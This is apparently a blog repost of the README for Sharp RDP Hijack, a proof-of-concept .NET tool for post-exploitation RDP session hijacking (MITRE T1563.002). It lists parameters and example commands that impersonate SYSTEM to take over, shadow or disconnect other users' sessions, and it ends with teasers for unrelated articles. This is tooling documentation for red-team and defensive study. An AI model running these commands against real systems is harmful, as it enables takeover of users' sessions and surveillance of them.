Sharp RDP Hijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility.
RDP session hijacking is a post-exploitation technique for taking control of (forcefully) disconnected interactive login sessions. The technique is described in Mitre ATT&CK T1563.002 – Remote Service Session Hijacking: RDP Hijacking.
[*] Parameters:
[*] A proof-of-concept Remote Desktop (RDP) session hijack utility
- For session hijacking, this utility must be run in an elevated context to connect to another session
- If a password is not specified, NT AUTHORITY\SYSTEM is impersonated
- For session query, admin privileges or "Remote Desktop Users" group membership is required on the target machine
[*] Parameters:
--tsquery=<host> : Query a host to identify RDP/TS session information (not required for other switches)
--session=<ID> : Target session identifier
--password=<User's Password> : Session password if known (otherwise optional - not required for disconnect switch)
--console : Redirect session to console session instead of current (active) session
--shadow : Shadow an active session (experimental)
--disconnect : Disconnect an active (remote) session
[*] Example Usage 1: Impersonate NT AUTHORITY\SYSTEM to hijack session #6 and redirect to the current session
SharpRDPHijack.exe --session=6
[*] Example Usage 2: Impersonate NT AUTHORITY\SYSTEM to hijack session #2 and redirect to the console session
SharpRDPHijack.exe --session=2 --console
[*] Example Usage 3: Hijack Remote Desktop session #4 with knowledge of the logged-on user's password
SharpRDPHijack.exe --session=4 --password=P@ssw0rd
[*] Example Usage 4: Disconnect active session #3
SharpRDPHijack.exe --session=3 --disconnect
[*] Example Usage 5: Query the local host for RDP/TS session information
SharpRDPHijack.exe --tsquery=localhost
[*] Example Usage 6: Shadow active session #3
SharpRDPHijack.exe --session=3 --shadow
[*] Example Usage 7: Shadow inactive session #2 by redirecting the session to the console
SharpRDPHijack.exe --session=2 --shadow --console For more information click here.
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…
Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…